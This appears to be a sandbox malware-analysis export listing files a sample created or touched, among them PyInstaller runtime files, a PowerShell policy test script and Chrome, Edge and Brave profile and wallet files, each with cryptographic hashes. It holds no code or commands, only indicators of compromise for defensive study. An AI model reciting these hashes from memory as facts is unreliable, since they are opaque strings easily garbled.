C:\Users\Admin\AppData\Local\Temp\_MEI43562\_overlapped.pyd
| MD5 | ba368245d104b1e016d45e96a54dd9ce |
| SHA1 | b79ef0eb9557a0c7fa78b11997de0bb057ab0c52 |
| SHA256 | 67e6ca6f1645c6928ade6718db28aff1c49a192e8811732b5e99364991102615 |
| SHA512 | 429d7a1f829be98c28e3dca5991edcadff17e91f050d50b608a52ef39f6f1c6b36ab71bfa8e3884167371a4e40348a8cda1a9492b125fb19d1a97c0ccb8f2c7b |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\_multiprocessing.pyd
| MD5 | a4281e383ef82c482c8bda50504be04a |
| SHA1 | 4945a2998f9c9f8ce1c078395ffbedb29c715d5d |
| SHA256 | 467b0fef42d70b55abf41d817dff7631faeef84dce64f8aadb5690a22808d40c |
| SHA512 | 661e38b74f8bfdd14e48e65ee060da8ecdf67c0e3ca1b41b6b835339ab8259f55949c1f8685102fd950bf5de11a1b7c263da8a3a4b411f1f316376b8aa4a5683 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\_asyncio.pyd
| MD5 | 28d2a0405be6de3d168f28109030130c |
| SHA1 | 7151eccbd204b7503f34088a279d654cfe2260c9 |
| SHA256 | 2dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d |
| SHA512 | b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\zlib1.dll
| MD5 | 297e845dd893e549146ae6826101e64f |
| SHA1 | 6c52876ea6efb2bc8d630761752df8c0a79542f1 |
| SHA256 | 837efb838cb91428c8c0dfb65d5af1e69823ff1594780eb8c8e9d78f7c4b2fc1 |
| SHA512 | f6efef5e34ba13f1dfddacfea15f385de91d310d73a6894cabb79c2186accc186c80cef7405658d91517c3c10c66e1acb93e8ad2450d4346f1aa85661b6074c3 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\VCRUNTIME140_1.dll
| MD5 | f8dfa78045620cf8a732e67d1b1eb53d |
| SHA1 | ff9a604d8c99405bfdbbf4295825d3fcbc792704 |
| SHA256 | a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5 |
| SHA512 | ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\tk86t.dll
| MD5 | 9fb68a0252e2b6cd99fd0cb6708c1606 |
| SHA1 | 60ab372e8473fad0f03801b6719bf5cccfc2592e |
| SHA256 | c6ffe2238134478d8cb1c695d57e794516f3790e211ff519f551e335230de7de |
| SHA512 | f5de1b1a9dc2d71ae27dfaa7b01e079e4970319b6424b44c47f86360faf0b976ed49dab6ee9f811e766a2684b647711e567cbaa6660f53ba82d724441c4ddd06 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\tcl86t.dll
| MD5 | 21dc82dd9cc445f92e0172d961162222 |
| SHA1 | 73bc20b509e1545b16324480d9620ae25364ebf1 |
| SHA256 | c2966941f116fab99f48ab9617196b43a5ee2fd94a8c70761bda56cb334daa03 |
| SHA512 | 3051a9d723fb7fc11f228e9f27bd2644ac5a0a95e7992d60c757240577b92fc31fa373987b338e6bc5707317d20089df4b48d1b188225ff370ad2a68d5ff7ba6 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\sqlite3.dll
| MD5 | 612fc8a817c5faa9cb5e89b0d4096216 |
| SHA1 | c8189cbb846f9a77f1ae67f3bd6b71b6363b9562 |
| SHA256 | 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49 |
| SHA512 | 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\pyexpat.pyd
| MD5 | 5e911ca0010d5c9dce50c58b703e0d80 |
| SHA1 | 89be290bebab337417c41bab06f43effb4799671 |
| SHA256 | 4779e19ee0f4f0be953805efa1174e127f6e91ad023bd33ac7127fef35e9087b |
| SHA512 | e3f1db80748333f08f79f735a457246e015c10b353e1a52abe91ed9a69f7de5efa5f78a2ed209e97b16813cb74a87f8f0c63a5f44c8b59583851922f54a48cf5 |
C:\Users\Admin\AppData\Local\Temp\_MEI43562\libssl-3.dll
| MD5 | 19a2aba25456181d5fb572d88ac0e73e |
| SHA1 | 656ca8cdfc9c3a6379536e2027e93408851483db |
| SHA256 | 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006 |
| SHA512 | df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f53207a5ca2ef5c7e976cbb3cb26d870 |
| SHA1 | 49a8cc44f53da77bb3dfb36fc7676ed54675db43 |
| SHA256 | 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23 |
| SHA512 | be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499 |
memory/2152-1322-0x0000020F8C920000-0x0000020F8C942000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bochmium.0pb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ae54e9db2e89f2c54da8cc0bfcbd26bd |
| SHA1 | a88af6c673609ecbc51a1a60dfbc8577830d2b5d |
| SHA256 | 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af |
| SHA512 | e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bb4ac2b8cc888f9e90d4fe2ead634a24 |
| SHA1 | c327858eb7f0cdf5d7d74ca85556c67fda63b40c |
| SHA256 | 5cd0c792c102b3e11aaa852853e24e31443e3d9975c557c7e8c6d955a3ab55d9 |
| SHA512 | afcecf2426e4b088de6fb0bd8fe396b85f988718f6fb5bd367c047eb2ee2387232776b98f16026743e4d69b2d2fecc2d0a54b6b69a9342f08b7035aa78720d91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f4610ee5a680dbcb471347872de9e21b |
| SHA1 | 6656a5410d52bc397cb8c3e81d60de0eeb9967de |
| SHA256 | 1e8bab9a25700e16358299018ed5464da743313c7fc9076c2d34f0aff763d80b |
| SHA512 | be2043569f09deecff02ad9af753be07360cbdc715c634f5513356d884459e849ebdc4c3f8d9b1ec4df6889b6dc4bda6b4bc7620f1fc4a14e0ba60378f73239a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0b62e5e3db15c720486890163257565d |
| SHA1 | 65cc40e992a8bd9eb891e1ecc3965917a3fd3c1f |
| SHA256 | 3f5ffc6fe7282a7fce5bae8f14d9cee85286497b1bdb8577457b032ab79c6886 |
| SHA512 | df99a85f0d6a0825d67dc5e48d5d96a9419647d3cf148727fe2554bdac49418c19182e137201cf6dbd0bb4f0d32b2532e443dcafd472cebc4d1a7ff19f4f5e7b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 923c64ed49db68c8582a3a56d715d6dd |
| SHA1 | 729b8cc0824143ae789cd0056b9121939d343825 |
| SHA256 | 3159ed38a3ad882e525709f9ae4f0595d0991eb64dc4e2e067eab62d8aed386a |
| SHA512 | dfd13708792d764a7644e403e42796ce8bd8d12798bfc2f667a3768f260399e802cbb6f53f1671587febb4edc8f3c15b658ecf4a97a26892d474a9ce84f502c6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d6d32fd68facba40a24fe87a48fbe656 |
| SHA1 | dd555674d40abd345cf88894a2eeda6aabed5c46 |
| SHA256 | 68368251260b291f32c11e987237aa5ec3749969f6ef246ff951b2cf830e322d |
| SHA512 | a38c03678878a1420cd6de7ba4f379416f0944b064a151937bb4a4354f4cbf481fefbf551444d608029203adda5f8eaaf70870c2b1f117a55d0cf313949ee87e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | cdcfc12e3bfc949a23ada43e6b26c8e2 |
| SHA1 | b14e51d6a785a6f66bc796ed3f25fd9557de1880 |
| SHA256 | 49cc7f206f6ea51f302edc5228a1e165346959ced8e4f3885c3133abd84c1eb2 |
| SHA512 | d762228bb9e7a88e287d8be3422035e645126a029969279ae7c7e28b5fa1c6c423db97e71e61fcefdedf124700f13d50ad7f5d09f18f777172d5a62eedd89d1d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 6d77c748a815affda97a19a2c41d8a92 |
| SHA1 | 4e827c762ef5b586bfc3f7ffbd87ac2d36723e74 |
| SHA256 | 701a731d9f61e7a3c3a2a7c38666e9b73d07167f5c809663defd7f84f4e6890c |
| SHA512 | c06c131a7f703bf31730e2161860aaec194ae682075f9822cb4ea628a294cece98ae718f9db3bc909cb45231eff0ddf42e955cb3cb9b2113f38c1e110aedbf97 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 1a8a11b03440a22a9ae024b9ee811c2d |
| SHA1 | 0b937f20f008e6126be2ec3ced7b1d7f8e43afd0 |
| SHA256 | 0cfe6f5311a5bbe96a7ff786811dcc466347f91d93176fec3168bcd24fa188fc |
| SHA512 | aab3ce184407eab01cbe0a387583d77a093d1c3904975581b166ff268a8287bb62a3f2365c03814cf91f5df68e8f163521dc34097580ebdc6f1ebced1a507514 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 61cc73e861f849906db47b4be5c4f4c9 |
| SHA1 | 37e1704c332dfad8949bce98d703e69291bff76e |
| SHA256 | a5f569be9a5118a04e4365b6ab7e9c354415e08101f176236f4f0d2e2d771119 |
| SHA512 | 7be86b3aa8e547d8fe33f8679a81e0f2291d09e34c8c51060a78f8d71a13c69a8ee61171ccf133cdf5f777ca0c7667e1b1edeedad07e998ab69a47c28bdb6bc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8c6e04a0c89f52075442ba6f5aea9414 |
| SHA1 | b0aec4edfdeaa7db186b7698b6e795cd8afaa14c |
| SHA256 | 08f3bc02f689b29f6d5b90ef11a2a898e07bc310e39d9b7762799afb170cb0b5 |
| SHA512 | aff1577c745af092a3c9a7ecaed87900a28b1d9d1d8b392fcb0715f35adf6a2fef882d6959f20f2c60acf89a9c0058d65f3c0e645553dc15d5713e0be6e8dc03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008
| MD5 | e955953b801c04327c1e96c67dd3c618 |
| SHA1 | f9061d3780f153e863478106bf1afd85132bccb0 |
| SHA256 | e8965a2d52ef25918ebee58ab6971745d396177a7943acf1ed53a65bb4dddd45 |
| SHA512 | 6318ff1eb838954dd73dab5ed891d47f4f39089fa5e899d30183c32269c5620bd09d169af4cf8303e3d5c2ebab23cfe9ae5d9fa5c3281023abb009f66a25782a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a1d91a45820c8e4ed3465573fe3943b8 |
| SHA1 | 0acacfc99b079025160354c8401adf3c27654b94 |
| SHA256 | ac0640900e98e8bb4c6ae1f247923af23107ff98933c58516cf024bf3a199a53 |
| SHA512 | 2102bc456f22655f4ac7e19ec4c2c7d718a688c20052c29ae3de3229d00c9e56148fd19c4cc6c99ede5c13bc2a6e56402b84a6a788f992c2d04ddee5b3b87d76 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | bc8d9c845f997e96aa4e369c44b04bbd |
| SHA1 | 843a2369beb5009cdfa72eceb2a229fee2b08233 |
| SHA256 | 729bd19c603b21a749e7b406a3bafcabda0b7ae45d9e522715b1440fd4f88cda |
| SHA512 | e82f451a13642da7efcab3bc2f37a6a1b97164bb3b20342c8897a4abf5e7a4a73ce2f23f806bf4e007956ab514d3829d977c3dfe5e26ac7ac378649b862c0ec3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | e087a08c4a2c410cb2a1b64d01fbcd98 |
| SHA1 | c9717002de051a11e1500edb6650baec68873526 |
| SHA256 | 13bbb3f2a49dc51a8e4026490617879394a88a96a2d59089fbafd140faa7e276 |
| SHA512 | 7b1fd428b8fe2a8635b336ebf18910e1f20e7f4ddc05e21ac8ad58830d627762b2487b33821cbdfdf54e7f453c0b3415207f89ba676b282dcff595b98c46adf4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c40a8199f87fcb99bfe405814d9f0f58 |
| SHA1 | 5cde8ee19716d95c03474f7e038a38bf8ef100f7 |
| SHA256 | e56ce0920432fa3e1b929cef6e55e9a6d548fa9266cf0920931023539998be60 |
| SHA512 | 3bf7ecc874130b07458d2ed4a690f1e995dace6832791a8bcdd543e78fed4832e7d3531b14977d10e3336201ec07a73e55fbd6ea0077e7ce9756de61e759860a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58b159.TMP
| MD5 | 080109caffb12266a02e411388353488 |
| SHA1 | 9e3d3776b08869000676bf98895791d04765440e |
| SHA256 | f638c322e07aebae620660dfaca931ec60eb76260c71168f90344639410c5ed4 |
| SHA512 | bbd2b9e6b0188828fba0a9989b1eeba11c5c51dc137fb0a41e9945cff9e2c4604801dfd211acba3606cc35d8c5edfe47c420f70f761c5ec456d290b680d3674d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 3afe99c688432697d929ac3e6c531e4e |
| SHA1 | a7aa87cc382e4b43c92e6cc9b93b590a28bee05d |
| SHA256 | 3eb5852cc02766adc416ad78a772bff36d4ce17db38dd950f52c8b8513b2b9e2 |
| SHA512 | dbf6b764ca4bb4b664961d6f4d06fba5fd490b48c29aabb6abc8d325f07d748cc85c1fa0e163fb2ad5aacca84346378d5d615522d6aa8b85436291620e832a3d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58ba43.TMP
| MD5 | 3a0a08ad4fa2f6cf309aaec198302090 |
| SHA1 | 1c0dac10ee4946e241f82056d17fedcb2bd942ea |
| SHA256 | f538688e36a17b19193dc203489a161f9ee8dd72691ec0c7633895cfd8a781dc |
| SHA512 | 41dcf711fc029c810d6dbf160583d60493098fb5355a80d3b4944f7cbd08e446cc2f65a04e98cde089b73558b105ca6119fd1441a036492d3280f192e54b730e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 94275bde03760c160b707ba8806ef545 |
| SHA1 | aad8d87b0796de7baca00ab000b2b12a26427859 |
| SHA256 | c58cb79fa4a9ade48ed821dd9f98957b0adfda7c2d267e3d07951c2d371aa968 |
| SHA512 | 2aabd49bc9f0ed3a5c690773f48a92dbbbd60264090a0db2fe0f166f8c20c767a74d1e1d7cc6a46c34cfbd1587ddb565e791d494cd0d2ca375ab8cc11cd8f930 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028
| MD5 | f7284dacd9314c4b9aca730b0dd12278 |
| SHA1 | 3c772f75ca632813eee80ba14e71447b9523ba52 |
| SHA256 | b50d5ffaafa1f3367773029b0bfc39915cf83cef76fe01145272d6b6861073f8 |
| SHA512 | b539a1aa9244eb4b70dd2ca7075a0e200ba5f5ad8f284c17ea0e3bd893bdf3852e5d0bd13f2a4f2b311baafd370e950d8ab8217971b5451c34015ecdcddf88b7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 30dd8e2fac854cbeea74e804710f52e3 |
| SHA1 | 44f1b460a87fe311cc8b8dfcfa262ad744ba643e |
| SHA256 | 852e11c880db340ae1207669e0d521a5d1831daf39d805ecb914df05901e76ae |
| SHA512 | 0126118770a319848b4f6d23ceb2371318f0e5f0a01b44084a0b42ce62fe3b039531c11b9c5155758aee3af3e059323157c1408f7b0b96ed0ad3371208b88138 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\06bc32d1-f218-4ae7-a957-13f024417c92.tmp
| MD5 | 5494c3109cc977ddbb44731e1e2953db |
| SHA1 | 8260a2975de7569006c99080f09f2d8a1676aa9a |
| SHA256 | 05fe0c0d2cbb1accd8fc3476133646915430165454b20cc469d3c153364f1523 |
| SHA512 | f1613c6daffdc46cf5466efc5fa2a3e3214bf7068f0de7e1b6e8b6a9b872c059c1b3fc17a6bcbce05261343d5058a56b03ec717d87270bc2872f1882b9c670ea |
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
| MD5 | f0d250e7864b14a6bb54b3dafc8b6b36 |
| SHA1 | 3b6bc2c3d84a5aa7cbd94bca399f2f0e2f28aa6f |
| SHA256 | 32c8a06d6b9f050891b9b379604d93b23b93d1ac4b4e65d84a9992e556d2e91b |
| SHA512 | 60bd3c103f8112b4f6495b46d3e74370f5db801ba20bbfabd114fa32a53e3bcc7a715b945bfae293aaf5d3680abb9b2b234cb32d7505b1fa298670340726e918 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 3fed79592a428f9f67ee60f71495ab27 |
| SHA1 | ada0e926e71a08ecc7a5cf747968e9db428fc1fd |
| SHA256 | 74c0f6e8ee6e7aa41f85b64124333729d4a90dc193b382e2e8805cfc23477956 |
| SHA512 | f8206debd1310b90742b6418bdebfa76668a8d317a305b3e833808d6681f75cbbab29f773b040b5baf7b1c1a0164d6407220190e9c0a6e93d1f0566a0d114357 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3e72be7890a99f4d15327073a0ca3fec |
| SHA1 | 9daab665ed006241fa740a58603c1714c1dc9059 |
| SHA256 | 06e5aa8a1be751b6e9490756197f030e9954fa61a702f43d03e9ef406b17ee17 |
| SHA512 | 6e9b0836652ba8e283b1c6b582e2e969e0645759ce55d6580ce278f00096d48f38d025c5bd6ddc74f7714df495c088c2df4f200cd6a848fb4914ff9bf8690f1a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 53a7682d0edf32852dc184dc8373647d |
| SHA1 | 1fb5655b12c6b11c0fa9bcd77312c90d176d93b1 |
| SHA256 | 39c2eeaaed729d79684526179212df976a1179e80da07a562af312161b816491 |
| SHA512 | f70770416161ead90ff636da0e2eca29db0031368a369d50e3e782ee1fa463e28f6d7abb8d264fa40951ed2cad08278adc72bce4f978c44278f660f51f547678 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c10dbe315d959d2b9f9f3606473cf4ac |
| SHA1 | 54f7461ddc1513d21e4c79e40729647c77b78e78 |
| SHA256 | f3282abdc9385a6709f1cde5b3b8c28dbd6936472fa8b1f39abc3ce175e5a1d2 |
| SHA512 | 31f51a9d64231d66786ff22625035e709c4fb9de55df1826445e1e5990a72dadf5084e956209dc8ed22809b4df5401727ffe85037a07492ec9bf37638bf97079 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | 506ddeeab5d4d645d787257908c203ed |
| SHA1 | 7a77681ed5474a237bb54f1a082a17cf576200fe |
| SHA256 | bce69bd515b3fd55cce6f5bd48369080b718aad3d42d589007fa7a022c5731a7 |
| SHA512 | ef53b0ff2f3400d1e01f31ac053b517a8618b6075f2c89623dcfadaafe24c617fc16223a17131e4ceead9e32572e24cf9c9b03a4cca0fba63b6679005139a6df |
C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\setup.exe
| MD5 | ca0cdaf50b7af48efef8afa84a355b57 |
| SHA1 | 08c59e77cc13fa8f7eae061a7d58cf2f7510dee1 |
| SHA256 | 4ab81a1acba32e190e04a21e94a811351d020ed09ec7f3ea81a4e685449785b0 |
| SHA512 | b7b08551ab48e579d93b81eca285168d2ab69c33fe6815463aad36a9fef36f680656b4bdea1b65565969584f4f1adc909b6e8f2a68939527ba82d5b775bff97e |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State~RFe59a5bc.TMP
| MD5 | 7736e969a57f599ac524e486ae9c42e1 |
| SHA1 | 8546f5a2888ad49c9c24fb6621665585da8b2f2f |
| SHA256 | 931ba07b1dea20e206828b7548c4714a13f989051fae601cbb3414d99a563055 |
| SHA512 | 6d94eaaeb4ea5bc4b2679b0c1d5157c929347939b95def56e62c382c12c676ba4dc75d973d1fe7b2c60e432d0891c773a9b45447ee214737e826998ea550af96 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Sync Data\LevelDB\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | dc3a628b1846b32510e056fad4786294 |
| SHA1 | d8867a77d55906d97e2fa11356918e8ccb526a0b |
| SHA256 | a7fb4532c56c5e1a7855453634f889628018b4633bb61c73d815a2dca93c2585 |
| SHA512 | e2677176e57fd1c6c03e72ddd83646e95e62de3e7766ff6042b922266b2bc1c768910e42b5b7c3786d8c394d1d53862801ef93fcb482b2726ec668a1a46a329b |
memory/2644-3313-0x00007FFD4E890000-0x00007FFD4E891000-memory.dmp
memory/2644-3312-0x00007FFD4D130000-0x00007FFD4D131000-memory.dmp
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\34e0c301-a952-4bbc-94b4-0425db331c6a.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\BraveWallet\Brave Wallet Storage\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\51a24af2-3a4b-4389-b3cb-be73e4b2f9ce.tmp
| MD5 | dceb0cfa9b61effc8788488f43747572 |
| SHA1 | c43235ebfd21469a747e8a264b67f874e0400cb9 |
| SHA256 | 4f6f8abe6e2a6bbfea1c79b495019e80015343160d7fd99ecd0d428c9a8fd57a |
| SHA512 | a4f5775c654fa4f31f53cb6fbab084939bd929feb95740b904045cd1f0a52c819e90876e56e66f7d1bb38db66fa0cb49c7365511f8346eec3cdc610e32b02c6b |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\GrShaderCache\data_3
| MD5 | c75766c7e2964f7f9fb467476d0370c4 |
| SHA1 | e83a6fda53d23d166a726a017c80276ea7cf8b60 |
| SHA256 | 602b36cb92d857a6231d1e8d3df1dd6bf19d3aab33e9163ee319c4d4e294ba54 |
| SHA512 | 22a17cd55f161d052c027f36e42d5d354d94a90edc5d49a69650fa0da5ad7747abd78aa185e1eedf5fe610b9409a822fa72063affb849d301c68c87d331c6b1e |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\GrShaderCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\GrShaderCache\data_0
| MD5 | 04ba73fe6abd9068788e7e2b8188b625 |
| SHA1 | ac70151f86b2ef3d00ccb9da866769dca05f0cef |
| SHA256 | e417924c20a4b5b7f1c70fae15f4c4309b9eeee9b69691c98baedb7ebbe5e508 |
| SHA512 | 011c31484df258842ff4e31f00d917451107ca475ed689f994a03c71b9da22e2ae7c5b204cf20859ca903c6db27f1b442566a7798d0172fcd7ae5e941315d611 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\afalakplffnnnlkncjhbmahjfjhmlkal_254ef2e5bbd09511f8417d8ae7b40a436dced204b888629f39601f912e259803
| MD5 | e5b08ddd037c546d397df82d0d6e7d3a |
| SHA1 | ee2408b971124367954b1e29afeefbc6d6adb7dc |
| SHA256 | 254ef2e5bbd09511f8417d8ae7b40a436dced204b888629f39601f912e259803 |
| SHA512 | db6e6608adf8951a68436664531efc1053b06237f1e2f4d647f3bae703a6423c02e194ac250a2f2a92226755aa3f879a4562dfb0491c9423116c26724ffd47e6 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Greaselion\Temp\scoped_dir2212_1360278192\manifest.json
| MD5 | 7488b6d6720532f4a267d26c247141d6 |
| SHA1 | 8c94c0b8a7da8bb87085cce4ad42641ad3e8a842 |
| SHA256 | fb5f4468336ac50fc71dee3568ed7bb2392952261076ea306fc9f4ed5972bde5 |
| SHA512 | 8567b3e896b5dd0bb3608f3fd65fd8cefd284ec4ed5dfa2d6803a962ff41d2c7a59c933f4dc9b9c7c6f6ffc4c0e8e85f62974fe3fbb09f758c2025523355dc42 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Greaselion\Temp\scoped_dir2212_483128681\manifest.json
| MD5 | 1ee6fefe3b23c7c7a8059c979886b744 |
| SHA1 | aed05f078d9b3da40e63a991ca07e36c99d67633 |
| SHA256 | ce710effc16c600f9b09699c3dd82c94ef60f63c98411d14dedb6c5dfc201d28 |
| SHA512 | 9b609cd8afbcf2c53cf71dda6c235914155f704d7119090658b55ed96b28c950c110cc4a2955e0780a2efc79ee78bbf46a15ee65d7144ac991c6748a3f2892f7 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Greaselion\Temp\scoped_dir2212_1478618529\manifest.json
| MD5 | 25e45b88de59ae31ed14c753d0ee98a7 |
| SHA1 | a1193ba5afb2ec60d42b36dcb6456da21555b1bb |
| SHA256 | 7b65ad26e9cabb61c61e7f1018632e36fd342c29c1079b83edea2114b0d60c31 |
| SHA512 | a7f7e538f12d65b93af9d926b330ae0a3ba9ea547724a5a7fcfaa8bed103d1f3813fc12115bbc56ff80c3da384b74244ce37e58387cce9b10a1ccdf2f779b29b |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Greaselion\Temp\scoped_dir2212_298499138\manifest.json
